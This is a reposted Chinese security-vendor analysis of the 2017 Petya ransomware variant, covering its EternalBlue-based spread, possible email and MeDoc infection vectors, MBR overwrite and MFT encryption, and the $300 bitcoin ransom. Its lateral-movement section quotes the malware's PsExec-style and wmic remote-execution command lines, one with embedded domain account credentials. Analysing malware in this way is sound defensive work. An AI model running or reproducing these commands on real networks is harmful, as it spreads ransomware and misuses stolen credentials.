居正:对,没错,自wannacry以来,又有一个病毒利用了同样的漏洞实行勒索攻击。。。。(跟风有意思吗)
据twitter爆料,乌克兰政府机构遭大规模攻击,其中乌克兰副总理的电脑均遭受攻击,目前腾讯电脑管家已经确认该病毒为Petya勒索病毒。腾讯安全反病毒实验室旗下的哈勃分析系统对收集到的病毒样本进行了分析,并已确认病毒样本通过永恒之蓝传播。根据病毒的恶意行为,哈勃已经能够识别此病毒并判定为高度风险。腾讯安全反病毒实验室提醒用户,开启腾讯电脑管家可查杀该病毒。
根据分析结果,病毒样本运行之后,会枚举内网中的电脑,并尝试在445等端口使用SMB协议进行连接。
深入分析发现,病毒连接时使用的是“永恒之蓝”(EternalBlue)漏洞,此漏洞在之前的WannaCry勒索病毒中也被使用,是造成WannaCry全球快速爆发的重要原因之一,此次Petya勒索病毒也借助此漏洞达到了快速传播的目的。
同时,病毒会修改系统的MBR引导扇区,当电脑重启时,病毒代码会在Windows操作系统之前接管电脑,执行加密等恶意操作。
电脑重启后,会显示一个伪装的界面,此界面实际上是病毒显示的,界面上假称正在进行磁盘扫描,实际上正在对磁盘数据进行加密操作。
当加密完成后,病毒才露出真正的嘴脸,要求受害者支付价值300美元的比特币之后,才会回复解密密钥。
这个加密流程与2016年起出现的Petya勒索病毒的流程相似,twitter上也有安全人员确认了二者的相似关系。但是不同的是,之前的Petya病毒要求访问暗网地址获取解密密钥,而此次爆发的病毒直接留下了一个Email邮箱作为联系方式。
下面是变种的分析
目录
Petya勒索软件新变种详细分析报告
Petya新变种简介
传播渠道分析
可能传播渠道-邮箱传播
可能传播渠道-MeDoc
详细功能分析
感染过程分析
磁盘加密和勒索细节
安全建议
参考资料
Petya新变种简介
据twitter爆料,乌克兰政府机构遭大规模攻击,其中乌克兰副总理的电脑均遭受攻击,目前腾讯电脑管家已经确认该病毒为Petya勒索病毒变种。Petya勒索病毒变种中毒后会扫描内网的机器,通过永恒之蓝漏洞自传播到内网的机器,达到快速传播的目的。
有国外安全研究人员认为,Petya勒索病毒变种会通过邮箱附件传播,利用携带漏洞的DOC文档进行攻击。中毒后,病毒会修改系统的MBR引导扇区,当电脑重启时,病毒代码会在Windows操作系统之前接管电脑,执行加密等恶意操作。电脑重启后,会显示一个伪装的界面,此界面实际上是病毒显示的,界面上假称正在进行磁盘扫描,实际上正在对磁盘数据进行加密操作。
当加密完成后,病毒要求受害者支付价值300美元的比特币之后,才会回复解密密钥。
传播渠道分析
可能传播渠道-邮箱传播
根据乌克兰CERT官方消息,邮件附件被认为该次病毒攻击的传播源头,邮箱附件是一个DOC文档,文档通过漏洞CVE-2017-0199来触发攻击,电脑管家也溯源到了国内类似邮件攻击最早发生在6月27日早上。在实际测试过程中,并没有完整重现整个攻击过程。
可能传播渠道-MeDoc
很多安全研究机构认为,这次Petya的攻击源是由于MeDoc软件的更新服务被劫持导致。
详细功能分析
感染过程分析
1,写MBR
0~0×21扇区保存的是病毒的MBR和微内核代码数据,而原始的MBR被加密保存在第0×22扇区。
2,加密文件
1)遍历分区
2)要加密的文件类型
3)文件加密过程
3、传播方式
1)可能通过管理共享在局域网内传播,而后通过wmic来实现远程命令执行。
C:\Windows\dllhost.dat \\10.141.2.26 -accepteula -s -d C:\Windows\System32\rundll32.exe “C:\Windows\perfc.dat”,##1 60 “RCAD\ryngarus.ext:FimMe21Pass!roy4″”RCAD\svcomactions:3GfmGeif”
c:\windows\system32\wbem\wmic.exe /node:”IP_ADDR” /user:”User” /password:”PWD” process call create “c:\windows\system32\rundll32.exe” \”c:\windows\perfc.dat\” #1
2)通过EternalBlue和EternalRomance漏洞传播。
程序发动攻击前,先尝试获取到可攻击的IP地址列表:
依次获取:已建立TCP连接的IP、本地ARP缓存的IP以及局域网内存在的服务器IP地址。收集完这些地址后,便进行进一步攻击。
磁盘加密和勒索细节
主要功能描述:
1、系统重启,恶意MBR加载;
2、检测磁盘是否被加密,如果没有则显示伪造 的检测磁盘界面、并加密MFT;
3、显示红色的勒索界面,让用户输入秘钥;
细节分析:
MBR启动后,将1-21扇区数据复制到8000地址 处,然后Jmp执行8000地址代码
通过读取标记位判断磁盘已经被加密
若磁盘没有加密,则显示伪造的检测磁盘界面,并加密MFT
加密完成后,读取扇区后面的勒索 语句
将获取到的语句显示到屏幕上
从屏幕获取秘钥并验证
参考资料
1, http://www.freebuf.com/articles/system/138567.html
2, https://securelist.com/schroedingers-petya/78870/
3, https://www.malwaretech.com/2017/06/petya-ransomware-attack-whats-known.html
5, http://blog.checkpoint.com/2017/06/27/global-ransomware-attack-spreading-fast/
6, https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759
文章由居正转载自: